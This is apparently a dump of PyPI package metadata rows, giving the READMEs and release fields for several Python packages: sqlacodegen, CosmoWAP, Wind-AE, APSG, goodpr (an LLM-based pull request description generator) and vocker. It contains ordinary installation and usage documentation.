option was enabled, in which case it would be named ``company`` in the case of a
many-to-one or one-to-one relationship).
A special case for single column many-to-one and one-to-one relationships, however, is
if the column is named like ``employer_id``. Then the relationship is named ``employer``
due to that ``_id`` suffix.
For self referential relationships, the reverse side of the relationship will be named
with the ``_reverse`` suffix appended to it.
When multiple foreign keys or junction tables connect to the same target table,
relationships use qualifiers for disambiguation. One-to-many relationships use FK
column names (e.g., ``simple_items_parent_container``, ``simple_items_top_container``).
Many-to-many relationships use junction table names (e.g., ``students_enrollments``,
``students_waitlist``), except for self-referential cases which use FK column names
(e.g., ``parent``, ``child``). The ``nofknames`` option reverts to underscore suffixes
(``simple_items_``, ``student_``).
Customizing code generation logic
=================================
If the built-in generators with all their options don't quite do what you want, you can
customize the logic by subclassing one of the existing code generator classes. Override
whichever methods you need, and then add an `entry point`_ in the
``sqlacodegen.generators`` namespace that points to your new class. Once the entry point
is in place (you typically have to install the project with ``pip install``), you can
use ``--generator <yourentrypoint>`` to invoke your custom code generator.
For examples, you can look at sqlacodegen's own entry points in its `pyproject.toml`_.
.. _entry point: https://setuptools.readthedocs.io/en/latest/userguide/entry_point.html
.. _pyproject.toml: https://github.com/agronholm/sqlacodegen/blob/master/pyproject.toml
Getting help
============
If you have problems or other questions, you should start a discussion on the
`sqlacodegen discussion forum`_. As an alternative, you could also try your luck on the
sqlalchemy_ room on Gitter.
.. _sqlacodegen discussion forum: https://github.com/agronholm/sqlacodegen/discussions/categories/q-a
.. _sqlalchemy: https://app.gitter.im/#/room/#sqlalchemy_community:gitter.im
Security contact information
============================
To report a security vulnerability, please use the `Tidelift security contact`_.
Tidelift will coordinate the fix and disclosure.
.. _Tidelift security contact: https://tidelift.com/security
| text/x-rst | null | Alex Grönholm <alex.gronholm@nextday.fi> | null | Idan Sheinberg <ishinberg0@gmail.com> | null | sqlalchemy | [
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"Environment :: Console",
"Topic :: Database",
"Topic :: Software Development :: Code Generators",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Programming Language :: Python :: 3.14"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"SQLAlchemy>=2.0.29",
"inflect>=4.0.0",
"sqlmodel>=0.0.22; extra == \"sqlmodel\"",
"sqlalchemy-citext>=1.7.0; extra == \"citext\"",
"geoalchemy2>=0.17.0; extra == \"geoalchemy2\"",
"pgvector>=0.2.4; extra == \"pgvector\""
] | [] | [] | [] | [
"Bug Tracker, https://github.com/agronholm/sqlacodegen/issues",
"Source Code, https://github.com/agronholm/sqlacodegen"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T09:02:14.080568 | sqlacodegen-4.0.1.tar.gz | 53,393 | c3/7b/365cddb20e8510efbe797964a0765b722c672f9534283fd154fceb6d7f93/sqlacodegen-4.0.1.tar.gz | source | sdist | null | false | c33825825c165574e32d1cadbfa7da4c | 98da03f3bf68e7966af609c5431b4706adb9c744a1690c01101298b05dc402f9 | c37b365cddb20e8510efbe797964a0765b722c672f9534283fd154fceb6d7f93 | MIT | [
"LICENSE"
] | 4,064 |
2.4 | cosmowap | 0.6.1 | package for computing power spectra and bispectra | # CosmoWAP
```
______ _ _____ ____
/ ____/___ _________ ___ ____| | / / | / __ \
/ / / __ \/ ___/ __ `__ \/ __ \ | /| / / /| | / /_/ /
/ /___/ /_/ (__ ) / / / / / /_/ / |/ |/ / ___ |/ ____/
\____/\____/____/_/ /_/ /_/\____/|__/|__/_/ |_/_/
```
[](https://pypi.org/project/cosmowap/)
[](https://github.com/craddis1/CosmoWAP/blob/main/LICENCE)
[](https://readthedocs.org/projects/cosmowap/builds/)
[](https://app.codacy.com/gh/craddis1/CosmoWAP/dashboard?utm_source=gh&utm_medium=referral&utm_content=&utm_campaign=Badge_grade)
[](https://ascl.net/2507.020)
[](https://pepy.tech/projects/cosmowap)
**Cosmo**logy with **W**ide-separation, rel**A**tivistic and **P**rimordial non-Gaussian contributions.
CosmoWAP is an effort to provide a (hopefully) self consistent framework to compute contributions within standard perturbation theory to the Fourier power spectrum and bispectrum including wide-separation and relativistic effects as well as Primordial non-Gaussianity (PNG).
These expressions can be very cumbersome and it can be tricky to check for consistency in the community and so hopefully this code should be useful in that regard.
CosmoWAP is a *Python* package to analyse the power spectra and bispectra but the analytical expressions themselves are computed analytically in Mathematica using routines which are publicly available at [*MathWAP*](https://github.com/craddis1/MathWAP) and then exported as .py files. Therefore the main functionality of CosmoWAP is to take these expressions and implement them for a given cosmology (from CLASS) and set of survey parameters.
## [*Documentation*](https://cosmowap.readthedocs.io/en/latest/)
[](https://cosmowap.readthedocs.io/en/latest/)
Full documentation is available at [*ReadtheDocs*](https://cosmowap.readthedocs.io/en/latest/).
> [!NOTE]
> Note this is still in progress as this is an evolving repo!
> Occasionally parts will be outdated and will contain deprecated methods.
## Installation
> [!NOTE]
> Requires at least Python >=3.10 for full functionality.
> For use of CosmoPower emulators we recommend using Python 3.10 or 3.11 - See Docs for full details.
``` sh
pip install cosmowap
```
For Development mode...
Clone repository:
``` sh
git clone https://github.com/craddis1/CosmoWAP.git
```
and then make editable install:
``` sh
cd cosmowap
pip install -e .
```
See requirements.txt for full list of dependencies (most are common python libraries). classy (CLASS python wrapper) is necessary to fully use CosmoWAP.
## Features
CosmoWAPs aim is to provide self-consistent modelling for the linear bispectrum and power spectrum. It contains redshift space expressions for the 3D Fourier (multipoles and full LOS dependent expressions) *power spectrum* (with multi-tracer capabilities) as well as the *bispectrum* (with Sccoccimarro spherical harmonic multipoles), including terms from:
- Wide separation (WS) effects (i.e. wide angle and radial redshift contributions) up to second order in the WS expansion
- Local Relativistic (GR) effects (including projection and dynamical effects) up to $\left(\frac{\mathcal{H}}{k}\right)^2$
- Integrated Effects, (e.g. lensing + ISW...) (power spectrum only currently)
- Primordial non-Gaussian (PNG) contribution for local, equilateral and orthogonal types
It also has a fully integrated forecasting and plotting library that allows these expressions to be explored.
### additional features
- Bias modelling through Luminosity functions and HOD/HMF
- Multi-tracer multipole covariances (assuming gaussianity)
- Finger-of-God damping and non-linear corrections
- TriPOSH bispectrum expansion terms (Coming soon)
## Usage
Base code based on work in [arXiv:2407.00168](https://arxiv.org/abs/2407.00168)
For Integrated effects see: [arXiv:2511.09466](https://arxiv.org/abs/2511.09466)
For PNG and Forecasting routines related please also refer to: arXiv:25xx.xxxx
## Contact
If you find any bugs or errors or have any questions and suggestions feel free to get in touch :) - c.l.j.addis@qmul.ac.uk
| text/markdown | null | Chris Addis <c.l.j.addis@qmul.ac.uk> | null | null | MIT | null | [
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"numpy",
"scipy>=1.15.0",
"matplotlib",
"tqdm",
"cython",
"classy<3.3.2.0",
"chainconsumer",
"cobaya"
] | [] | [] | [] | [
"homepage, https://github.com/craddis1/CosmoWAP"
] | twine/6.2.0 CPython/3.13.5 | 2026-02-20T09:01:34.900781 | cosmowap-0.6.1.tar.gz | 4,992,434 | ca/a7/3def949fa326b9cd40d7efc6cf27712d761a71b511d87737ff3ab16cb64a/cosmowap-0.6.1.tar.gz | source | sdist | null | false | 6c1dc7250780ad70e15c429648a5600e | 9274f834e509a24a0939999cbcdf510d50db2a781adac230a52586ba77eda200 | caa73def949fa326b9cd40d7efc6cf27712d761a71b511d87737ff3ab16cb64a | null | [
"LICENSE.txt"
] | 214 |
2.4 | wind_ae | 1.0.1 | 1D relaxation Parker wind model with metal and X-ray physics based on Murray-Clay et al. (2009) | <img src="docs/windae_logo_blue_light.png" alt="Wind-AE Logo" width="350"/>
<h1></h1>
<h1 style="text-align: center;"><a href="https://wind-ae.readthedocs.io/en/latest/">Read the Docs</a></h1>
<!-- <button type="button">Click Me!</button> -->
`Wind-AE` (pronounced /windy/) stands for "wind atmospheric escape" and is a relatively fast 1D, steady-state, hydrodynamic, non-isothermal, Parker wind relaxation code for modeling atmospheric escape based on [Murray-Clay et al. (2009)](https://ui.adsabs.harvard.edu/abs/2009ApJ...693...23M/abstract). `Wind-AE` is a forward model that solves the energy conservation, momentum conservation, and ionization equilibrium equations at the substellar point using the ["Numerical Recipes in C"](https://ui.adsabs.harvard.edu/abs/1992nrca.book.....P/abstract) relaxation method. This allows `Wind-AE` to quickly compute the atmosphere mass loss rate as well as upper atmosphere (<~100 microbar) velocity, temperature, density, and ionization structure as a function of altitude.
`Wind-AE` updates [Murray-Clay et al. (2009)](https://ui.adsabs.harvard.edu/abs/2009ApJ...693...23M/abstract) to allow for the modeling of atomic metals and multifrequency XUV stellar spectra (Broome et al. submitted). If you use `Wind-AE`, please consider citing Broome et al. (submitted).
We appreciate your patience while the docs are developed. In the meantime, take advantage of `Notebooks/Quickstart.ipynb` to get a quick orientation to `Wind-AE` and please report any bugs via [Github](https://github.com/mabroome/wind-ae/issues) or via email to mabroome@ucsc.edu.

[](https://coveralls.io/github/mibroome/wind-ae?branch=main)


[](https://opensource.org/licenses/BSD-3-Clause)
[](https://semaphorep.github.io/codeastro/)
Is Wind-AE the right tool for me?
----------------------
`Wind-AE` is well-suited for users interested in **quickly estimating mass loss rates** or outflow structure. Outflow structure includes bulk temperature and per-species ionization fractions as a function of radius, so can be easily translated into approximating and **predicting observables and transits**, including metastable helium (He 10830$\AA$) transits, though a He transit module is not yet included. Precise modeling of lower atmosphere ($\lssim 100 \mu$bar) is considered necessary for highly accurate transit models, but Wind-AE can be easily coupled to lower atmosphere photochemistry models whose outputs can (e.g., radius, temperature, abundances, ionization fractions, etc. at 1 $\mu$bar) can be fed into Wind-AE as inputs.
>*If you are interested in outflow structure:* Past the Coriolis turning radius (a few planetary radii) 3D physics dominates, so `Wind-AE` does not integrate past that point. `Wind-AE` also makes simplifying assumptions about the region below the region below the wind-launch radius (~10 nanobars).
Because `Wind-AE` runs on the order of seconds to minutes, it can be (and has been) used to **model planet evolution** [(Tang et al. 2025)](https://ui.adsabs.harvard.edu/abs/2025ApJ...995...20T/abstract).
#### `Wind-AE` can model:
- Multiple atomic species
- X-ray physics (secondary ionizations and K-shell ionization cross-sections for relevant metals)
- Both low and high stellar XUV flux
- **Heating & Cooling**: Ionization heating, bolometric heating & cooling (negligible in wind), PdV cooling (work done due to expansion of gas), radiative / atomic line cooling (Lyman-$\alpha$, OI, OII, OIII, CI, CII), recombination cooling
#### `Wind-AE` does not (currently) include:
- **Magnetic fields**
- **Time dependence**
- **Diffusion/drag** - the atomic species set by the user are assumed to be entrained in the outflow and in thermal equilibrium. This is an appropriate assumption for species below the [crossover mass](https://ui.adsabs.harvard.edu/abs/1987Icar...69..532H) and a warning will be raised.
- **Heating & Cooling**: Conduction (warning raised if relevant, **planned**), H3+ line cooling (not planned), Fe & Ca line cooling (relevant at high Z only, **planned**), free-free cooling (warning raised if relevant, not planned)
- Multiple ionization states of the same species (**planned**)
See [Broome et al. (2025)](https://ui.adsabs.harvard.edu/abs/2025ApJ...995..198B/abstract) for more details.
- Want a rapid H/He model with power-law approximated XUV spectra? Check out [ATES](https://github.com/AndreaCaldiroli/ATES-Code) ([Caldiroli et al. 2021](https://ui.adsabs.harvard.edu/abs/2021A%26A...655A..30C/abstract))
- Do you want to set the mass loss rate ($\dot{M}$) yourself or want an EUV isothermal Parker wind outflow model that runs in nanoseconds? Check out [p-winds](https://github.com/ladsantos/p-winds) ([Dos Santos et al. 2022](https://ui.adsabs.harvard.edu/abs/2022A%26A...659A..62D/abstract)).
- Do you want to use p-winds and get transit models for metals via Cloudy? Check out [Sunbather](https://github.com/antonpannekoek/sunbather) ([Linssen et al. 2024](https://ui.adsabs.harvard.edu/abs/2024A%26A...688A..43L/abstract))
- Want to leverage Cloudy and the hydrodynamic code PLUTO for more thorough XUV-irradiated, but slightly more expensive calculations? Check out TPCI ([Salz et al. 2015](https://ui.adsabs.harvard.edu/abs/2015A%26A...576A..21S/abstract))
- That sound great, but you prefer to code in Python over C/C++? Check out [pyTPCI](https://ascl.net/2506.012). ([Riley, Zhang, & Bean 2025](https://ui.adsabs.harvard.edu/abs/2025ApJ...980...34R/abstract))
- Do you care about diffusion throughout the wind? Check out [AIOLIS](https://github.com/Schulik/aiolos) ([Schulik & Booth, 2022](https://ui.adsabs.harvard.edu/abs/2023MNRAS.523..286S/abstract)).
- Want to model the lower atmosphere in more detail? Check out CETIMB (Koskinen et al. 2022)
- Just want a grid of mass loss rates for pure-Hydrogen, low-flux-EUV-irradiated planets? See [Kubyshkina & Fossati](https://ui.adsabs.harvard.edu/abs/2021RNAAS...5...74K/abstract)
- Want a grid of mass loss rates for pure-Hydrogen, high-flux-XUV-irradiated planets? See [Owen & Jackson (2012)](https://ui.adsabs.harvard.edu/abs/2012MNRAS.425.2931O/abstract)
>Want your model added to this list or to update the short bio? Email mabroome@ucsc.edu
Requirements
------------
`Wind-AE` requires the following packages and will pip install them automatically by following the Installation guide below.
* `python`>3.13
* `numpy`
* `scipy`
* `astropy`
* `pandas`>=2.2.3
* `matplotlib`
* `datetime`
* `pyarrow`
* `fastparquet`
* `requests`
* `ChiantiPy`
Installation
------------
Until `Wind-AE` is dockerized, it is recommended to use a Python environment to avoid dependency issues. However, if your system meets the above requirements, there is no need to create an environment and you can skip to the compilation step.
To create an environment use either
```angular2html
python3 -m venv venv_name.venv
source venv_name.venv/bin/activate
```
or using `conda`
```angular2html
conda create -n venv_name
conda activate venv_name
conda install pip
```
### Pip install
Recommended:
```angular2html
pip install --upgrade pip
```
Then
```angular2html
pip install wind_ae
```
### OR Compile from source (BETA)
Clone the repository using
```angular2html
git clone https://github.com/mibroome/wind-ae/
```
or navigate to [github.com/mibroome/wind-ae/](https://github.com/mibroome/wind-ae/) and download and unzip the zip file.
To compile from the source,
```angular2html
pip install -r requirements.txt
pip install -e .
```
### Confirming the import was successful
Run tests (optional). Estimated time: 4 minutes.
```angular2html
cd wind-ae && pytest
```
Otherwise, you can test the install by running
```angular2html
python -c "import wind_ae"
```
Now you can run `Wind-AE` from anywhere! As seen in the tutorial (`Notebooks/Quickstart.ipynb`), the following imports are helpful for most purposes.
```angular2html
from wind_ae.wrapper.relax_wrapper import wind_simulation as wind_sim
from wind_ae.wrapper.wrapper_utils.plots import energy_plot six_panel_plot quick_plot
from wind_ae.wrapper.wrapper_utils import constants as const
from wind_ae.wrapper.wrapper_utils.system import system
from wind_ae.wrapper.wrapper_utils.spectrum import spectrum
```
> **Note**: If you ever need to interface directly with the `C` code, it lives in `wind_ae/src/` and can be excecuted from within the `wind_ae/` folder via `./bin/relaxed_ae`. The solution generated will be for a planet with the parameters detailed in the input files in the `Inputs/` folder. There is generally no need to interface with the `C` code and most standard tasks can be accomplished by using the Python wrapper.
## Future features and known problems:
- Computation of the complementary error function that governs the drop-off of bolometric heating/cooling is not truly self-consistent (`converge_mol_atomic_transition(polish=True, width=)`) and may require visual confirmation via `energy_plot()` (checking whether bolometric heating/cooling impede too far into photoionization heating or fall too short) and manual adjustment of the `width` parameter or:
```python
sim.load_planet('path/to/planet/file')
bcs = np.copy(sim.windsoln.bcs_tuple)
# erf_loc - normalized velocity value at radius where you want the erf to drop
# erf_rate - how quickly the erf drops off in units of Hsc at erf_loc
# To get initial estimate, run sim.erf_velocity(polish=True)
bcs[-1] = np.array([erf_loc, erf_rate])
sim.inputs.write_bcs(*bcs)
sim.run_wind()
```
- Knudsen number calculations currently only contain H-H collisions.
- Converting spectrum ``kind`` from ``'full'`` to ``'mono'`` occasionally has issues.
--------
### Check out the [open issues](https://github.com/mabroome/wind-ae/issues).
| text/markdown | Madelyn Broome, John McCann, Ruth Murray-Clay | null | null | null | null | null | [
"Programming Language :: Python :: 3",
"Operating System :: OS Independent"
] | [] | null | null | >=3.13 | [] | [] | [] | [
"scipy>1.6",
"numpy",
"astropy",
"IPython",
"pandas>=2.2.3",
"matplotlib",
"datetime",
"pyarrow",
"fastparquet",
"requests",
"ChiantiPy",
"pytest"
] | [] | [] | [] | [
"Homepage, https://github.com/mibroome/wind_ae",
"Issues, https://github.com/mibroome/wind_ae/issues"
] | uv/0.8.12 | 2026-02-20T09:01:25.355931 | wind_ae-1.0.1.tar.gz | 1,554,390 | 78/35/bd9ffec377d9184d0ebd4ad695af5a4754b046f3df022ad56546e8ddf90f/wind_ae-1.0.1.tar.gz | source | sdist | null | false | a60b2f9173ddf8c7007a35bcb9374d0f | 21eddffaeba508b0e7b05120f587822adce52e4b634ed9b96703f810476ee9e9 | 7835bd9ffec377d9184d0ebd4ad695af5a4754b046f3df022ad56546e8ddf90f | BSD-3-Clause | [
"LICENSE"
] | 0 |
2.4 | apsg | 1.4.0 | APSG - The package for structural geologists | <img src="https://ondrolexa.github.io/apsg/apsg_banner.svg" alt="APSG logo" width="300px"/>
[](https://pypi.org/project/apsg)
[](https://anaconda.org/conda-forge/apsg)
[](https://apsg.readthedocs.io/en/stable/?badge=stable)
[](https://zenodo.org/badge/latestdoi/24879346)
## :thinking: What is APSG?
APSG is the package for structural geologists. It defines several new python classes to easily manage, analyze and visualize orientational structural geology data.
> [!IMPORTANT]
> APSG has been significantly refactored from version 1.0 and several changes are
> breaking backward compatibility. The main APSG namespace provides often-used
> classes in lowercase names as aliases to `PascalCase` convention used in
> modules to provide a simplified interface for users. The `PascalCase` names of
> classes use longer and plain English names instead acronyms for better readability.
>
> Check [documentation](https://apsg.readthedocs.org) for more details.
## :hammer_and_wrench: Requirements
You need Python 3.10 or later to run APSG. The package requires [NumPy](https://numpy.org/) and [SciPy](https://www.scipy.org/),
[Matplotlib](https://matplotlib.org/), [SciPy](https://scipy.org/), [SQLAlchemy](https://www.sqlalchemy.org/)
and [pandas](https://pandas.pydata.org/).
## :rocket: How to install
It is strongly suggested to install **apsg** into separate environment. You can create
Python virtual environment. For Linux and macOS use:
python -m venv .venv
source .venv/bin/activate
for Windows use Command Prompt or PowerShell:
python -m venv .venv
.venv\Scripts\activate
> [!NOTE]
> On Microsoft Windows, it may be required to set the execution policy in PowerShell for the user.
> You can do this by issuing the following PowerShell command:
> ```
> Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope CurrentUser
> ```
and install latest stable version of **apsg** using pip within the environment:
pip install apsg
To include jupyterlab and pyqt5 in installation, use `extra` option:
## I'm using conda or mamba to manage environments
pip install apsg[extra]
or install **master** with:
pip install git+https://github.com/ondrolexa/apsg.git
Alternatively, you can clone the repository and do a local install (recommended for dev):
git clone https://github.com/ondrolexa/apsg.git
cd apsg
pip install -e .[dev]
#### Upgrading via pip
To upgrade an existing version of APSG from PyPI, execute:
pip install apsg --upgrade --no-deps
#### Comments on system-wide instalations on Debian systems
Latest Debian-based systems does not allow to install non-debian packages system-wide.
However, installing all requirements allows to force install APSG system-wide without troubles.
Install requirements using apt:
sudo apt install python3-numpy python3-matplotlib python3-scipy python3-sqlalchemy python3-pandas
and then install apsg using pip:
pip install --break-system-packages apsg
### I'm using conda or mamba to manage environments
If you have already have conda or mamba installed, you can create environment with:
conda config --add channels conda-forge
conda create -n apsg python apsg jupyterlab pyqt
or using mamba
mamba create -n apsg python apsg jupyterlab pyqt
#### Current release info
| Name | Downloads | Version | Platforms |
| --- | --- | --- | --- |
| [](https://anaconda.org/conda-forge/apsg) | [](https://anaconda.org/conda-forge/apsg) | [](https://anaconda.org/conda-forge/apsg) | [](https://anaconda.org/conda-forge/apsg) |
## :blue_book: Documentation
Explore all the features of APSG. You can find detailed documentation [here](https://apsg.readthedocs.org).
## :computer: Contributing
Most discussion happens on [Github](https://github.com/ondrolexa/apsg). Feel free to open [an issue](https://github.com/ondrolexa/apsg/issues/new) or comment on any open issue or pull request. Check ``CONTRIBUTING.md`` for more details.
## :coin: Donate
APSG is an open-source project, available for you for free. It took a lot of time and resources to build this software. If you find this software useful and want to support its future development please consider donating me.
[](https://www.paypal.com/cgi-bin/webscr?cmd=_donations&business=QTYZWVUNDUAH8&item_name=APSG+development+donation¤cy_code=EUR&source=url)
## License
APSG is free software: you can redistribute it and/or modify it under the terms of the MIT License. A copy of this license is provided in ``LICENSE`` file.
| text/markdown | null | Ondrej Lexa <lexa.ondrej@gmail.com> | null | Ondrej Lexa <lexa.ondrej@gmail.com> | null | structural geology, stereonet, orientation data | [
"Development Status :: 4 - Beta",
"Intended Audience :: Science/Research",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"numpy",
"matplotlib>=3.9",
"scipy",
"sqlalchemy",
"pandas",
"jupyterlab; extra == \"extra\"",
"pyqt5; extra == \"extra\"",
"pytest; extra == \"tests\"",
"sphinx; extra == \"docs\"",
"sphinx_rtd_theme; extra == \"docs\"",
"readthedocs-sphinx-search; extra == \"docs\"",
"ipykernel; extra == \"docs\"",
"nbsphinx; extra == \"docs\"",
"autodocsumm; extra == \"docs\"",
"apsg[docs,extra,tests]; extra == \"dev\"",
"black; extra == \"dev\""
] | [] | [] | [] | [
"Homepage, https://github.com/ondrolexa/apsg",
"Documentation, https://apsg.readthedocs.io",
"Repository, https://github.com/ondrolexa/apsg.git",
"Issues, https://github.com/ondrolexa/apsg/issues",
"Changelog, https://github.com/ondrolexa/apsg/blob/master/CHANGELOG.md"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T09:01:16.345707 | apsg-1.4.0.tar.gz | 80,328 | f6/34/6c35ebf96967a7d2a6c7e35a94f603516fcfcb7437368399b3249d50ac2b/apsg-1.4.0.tar.gz | source | sdist | null | false | 06705b835aa0b730f8c804a3bd2c83bf | eedd813ae5e026341dab6ad6a98cfa6ab08b46d944b4e233497d6ddd12c9e4c5 | f6346c35ebf96967a7d2a6c7e35a94f603516fcfcb7437368399b3249d50ac2b | MIT | [
"LICENSE"
] | 230 |
2.4 | goodpr | 0.1.0 | Add your description here | # goodpr
Generate a professional pull request description from a local git repository using LangChain Deep Agents and Gemini.
## Requirements
- Python 3.13+
- [uv](https://docs.astral.sh/uv/)
- A `GOOGLE_API_KEY` for the Gemini API
## Setup
```bash
# Clone and install
uv sync
# Add your Gemini API key
echo GOOGLE_API_KEY=your_key_here > .env
```
## Usage
```bash
uv run goodpr <path/to/repo> --commit-offset <N>
```
| Argument | Description |
|---|---|
| `path/to/repo` | Absolute or relative path to a local git repository |
| `--commit-offset N` | Number of commits back from HEAD to include (default: 5) |
| `--log-file PATH` | Log file path (default: `goodpr.log`) |
**Example** — describe the last 10 commits:
```bash
uv run goodpr C:/projects/myapp --commit-offset 10
```
Output is written to stdout as Markdown, suitable for pasting directly into a GitHub / GitLab PR.
## How it works
```mermaid
flowchart TD
CLI["CLI\nmain.py"]
Git["git format-patch\nHEAD~N..HEAD"]
File["patch_context.txt\nraw patch"]
BuildIndex["build_patch_index()\nchunk by file, BM25"]
Index["BM25 index\nin-memory"]
Main["Main Agent\nGemini 3 Flash"]
SumAgent["summary-agent\nsearch_patch() only"]
ImplAgent["implications-agent\nsearch_patch() only"]
SumOut["TITLE / SUMMARY\nFILES / CHANGE_TYPES"]
ImplOut["BREAKING / MIGRATIONS\nDEPS_CONFIG / TESTING / RISK"]
PR["Final PR\nMarkdown output"]
CLI --> Git
Git --> File
File --> BuildIndex
BuildIndex --> Index
Main -->|"task() STEP 1"| SumAgent
SumAgent -->|"search_patch(query)"| Index
SumAgent --> SumOut
SumOut --> Main
Main -->|"task() STEP 2"| ImplAgent
ImplAgent -->|"search_patch(query)"| Index
ImplAgent --> ImplOut
ImplOut --> Main
Main -->|"STEP 3 compose"| PR
```
### Key design decisions
- **Raw patch on disk** — the full patch is written to `patch_context.txt` (capped at ~500KB from `git format-patch`). Subagents do **not** read this file directly; they only see patch content via search results.
- **BM25 search only** — at startup, the raw patch is chunked per-file-per-commit and indexed with BM25. Subagents use `search_patch(query)` to retrieve relevant chunks (e.g. by file name, function, or keyword) and can analyze the full patch without loading it all at once.
- **File-based handoff** — the patch path is passed in the user message and to `build_pr_agent()` so the BM25 index can be built. After that, all patch access is through the `search_patch` tool, not direct file reads.
- **Structured subagent output** — each subagent returns a fixed labeled format (`TITLE:`, `SUMMARY:`, `BREAKING:`, `RISK:`, etc.) so the main agent can compose the final PR deterministically.
- **Skills** — PR writing guidelines are loaded from `skills/pr/SKILL.md` at runtime.
| text/markdown | null | null | null | null | null | null | [] | [] | null | null | >=3.13 | [] | [] | [] | [
"deepagents>=0.4.1",
"langchain>=1.2.10",
"langchain-community>=0.3.0",
"python-dotenv>=1.0.0",
"rank-bm25>=0.2.2"
] | [] | [] | [] | [] | uv/0.10.4 {"installer":{"name":"uv","version":"0.10.4","subcommand":["publish"]},"python":null,"implementation":{"name":null,"version":null},"distro":{"name":"Ubuntu","version":"24.04","id":"noble","libc":null},"system":{"name":null,"release":null},"cpu":null,"openssl_version":null,"setuptools_version":null,"rustc_version":null,"ci":true} | 2026-02-20T09:01:06.401874 | goodpr-0.1.0.tar.gz | 11,110 | 1e/55/7cf1cc4b0634a3477ce7cd1cf071ec6e641abf3090620917c83586dbf4c3/goodpr-0.1.0.tar.gz | source | sdist | null | false | 129b543f24e47bdbfd1324665d2d789d | 783383e8b51223736e6a2586aa837aa09f619e8f8163471679eeca7bed41a35f | 1e557cf1cc4b0634a3477ce7cd1cf071ec6e641abf3090620917c83586dbf4c3 | null | [] | 221 |
2.4 | jfinqa-helm | 0.1.0 | HELM plugin for JFinQA: Japanese Financial Numerical Reasoning QA Benchmark | # jfinqa-helm
HELM plugin for [JFinQA](https://github.com/ajtgjmdjp/jfinqa): Japanese Financial Numerical Reasoning QA Benchmark.
## Installation
```bash
pip install crfm-helm jfinqa-helm
```
## Usage
```bash
helm-run --run-entries jfinqa:model=openai/gpt-4o
```
## About JFinQA
JFinQA contains 1,000 questions across three subtasks:
- **numerical_reasoning** (550 questions): Calculate financial ratios, growth rates, etc.
- **consistency_checking** (200 questions): Verify whether a statement is consistent with financial data
- **temporal_reasoning** (250 questions): Reason about changes over multiple fiscal years
Questions are drawn from 68 companies' EDINET filings covering J-GAAP, IFRS, and US-GAAP.
**Dataset**: [ajtgjmdjp/jfinqa](https://huggingface.co/datasets/ajtgjmdjp/jfinqa)
## License
Apache-2.0
| text/markdown | ajtgjmdjp | null | null | null | Apache-2.0 | benchmark, finance, helm, japanese, nlp | [
"Development Status :: 3 - Alpha",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: Apache Software License",
"Programming Language :: Python :: 3",
"Topic :: Scientific/Engineering :: Artificial Intelligence"
] | [] | null | null | >=3.9 | [] | [] | [] | [
"crfm-helm>=0.5.0",
"datasets>=2.0"
] | [] | [] | [] | [
"Homepage, https://github.com/ajtgjmdjp/jfinqa",
"Dataset, https://huggingface.co/datasets/ajtgjmdjp/jfinqa"
] | uv/0.10.0 {"installer":{"name":"uv","version":"0.10.0","subcommand":["publish"]},"python":null,"implementation":{"name":null,"version":null},"distro":{"name":"macOS","version":null,"id":null,"libc":null},"system":{"name":null,"release":null},"cpu":null,"openssl_version":null,"setuptools_version":null,"rustc_version":null,"ci":null} | 2026-02-20T08:59:43.018763 | jfinqa_helm-0.1.0.tar.gz | 2,926 | c3/2b/f00d417d87f9e4d274d2558b36bfa4dad853f8cdbb8a83261f2c29705b8e/jfinqa_helm-0.1.0.tar.gz | source | sdist | null | false | 96d178628c7aaec624edd4228987f0f8 | 0b9c8b0110506a58256c9d026167976d78ddb393e62751b8ba9c0ee2aabeb317 | c32bf00d417d87f9e4d274d2558b36bfa4dad853f8cdbb8a83261f2c29705b8e | null | [] | 226 |
2.4 | vocker | 0.6.2 | Docker-like manager for virtualenvs | # vocker
Manager for complete Python environments written with security in mind. Mostly for Windows.
## Why
OK so here's a typical experience. You're working on different Python projects which require incompatible versions of dependencies. For example, one of them needs `libfoo==1.0.0` and the other needs `libfoo>3.0.0`. There's just no way to satisfy both. Python people encourage you to create different virtualenvs ("venvs") for different purposes. Sometimes a user reports a bug that they experience with some very specific version of a dependency, so you need to create yet another venv just to investigate that.
Here's a problem: every venv you install takes up a few hundred megabytes of disk space, and a lot of it is for completely redundant files. You were conned into buying an overpriced non-modular computer, so now your tiny non-upgradeable SSD space is now filled with many copies of the same files. You regret your life choices. Wouldn't it be nice if the duplicate files across different venvs didn't take up any additional space?
Users often report bugs against very specific versions of your software, and the café you work at has pretty slow WiFi. Installing hundreds of megabytes of the same packages over and over quickly grows tiresome. Wouldn't it be nice if you could just copy an existing venv and just tweak it a bit, for example replace the few packages that are actually different?
Finally, some of your nontechnical users refuse to compile and install their own software, but they do want to sometimes have multiple versions installed for testing purposes. However, they also bought non-upgradeable hardware so they don't want multiple copies of the same files that are identical across different versions of the software. Wouldn't it be nice if installing a new venv somehow recycled the existing files from the currently-installed venvs?
Some of your users are paranoid about security. Wouldn't it be nice if the software integrity of the venv-based software package were guaranteed through hashing and Merkle trees?
That's why.
## Goals
- Developers can easily create images, and then distribute them to users who use them to run applications. The users don't necessarily use vocker directly to create containers, they may use some extra layer on top of it (like an installer that provides a GUI and maybe digital signature verification).
- Developers can easily create images from existing images by tweaking whatever needs to be different. For example, installing new software or modifying files.
- Image creation should be reproducible. That is, creating a Python environment and then turning it into an image should give you exactly the same image if you do that a second time. The resulting image hash should be identical.
- Developers can easily audit existing images by just rebuilding them from scratch and checking whether the final result is the same.
## Non-goals
- Digital signature verification.
| text/markdown | null | Eduard Christian Dumitrescu <eduard.c.dumitrescu@gmail.com> | null | null | General Public License v3 | null | [] | [] | null | null | null | [] | [] | [] | [
"atomicwrites",
"attrs",
"boltons",
"cached_property",
"filelock",
"immutabledict",
"marshmallow",
"platformdirs",
"sansio_tools>=1",
"sqlalchemy_boltons>=5",
"SQLAlchemy",
"structlog",
